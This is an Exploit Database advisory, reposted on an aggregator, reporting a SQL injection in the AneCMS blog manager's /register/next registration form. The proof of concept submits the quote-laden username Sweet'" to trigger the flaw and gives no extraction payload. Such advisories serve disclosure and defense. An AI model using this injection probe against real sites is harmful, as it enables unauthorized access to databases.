AneCMS – ‘/registre/next’ SQL Injection

• Exploit Database
• 7 阅读

• 作者： Sweet
  日期： 2010-08-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14716/

• ############################################################################
  ##
  # Exploit Title: anecms SQli #
  ##
  # Date: 23/08/2010 #
  ##
  # Author: Sweet#
  ##
  # Contact : charif38@hotmail.fr#
  ##
  # Software Link: anecms.com#
  ## 
  # Download: anecms.com/anecms.zip#
  ## 
  # Version: All #
  ##
  # Tested on: WinXp sp3 #
  # Description : anecms is an open source blog manager# 
  ##
  ##
  ##
  ############################################################################
  
  Sqli:
  
  The POST variable username has been set to sweet'" on http://vulnerable.com/register/next
  
  Poc:
  
  http://www.example.com/register/next
  
  username = Sweet'"
  
  password = test
  
  re password = test
  
  email = charif38@hotmail.fr
  
  then register :]
  
  screen : http://img830.imageshack.us/img830/1213/anecm.jpg
  
  
  
  
  
  
  
  
  
  Saha Ftourkoum et 1,2,3 viva L'Algerie :))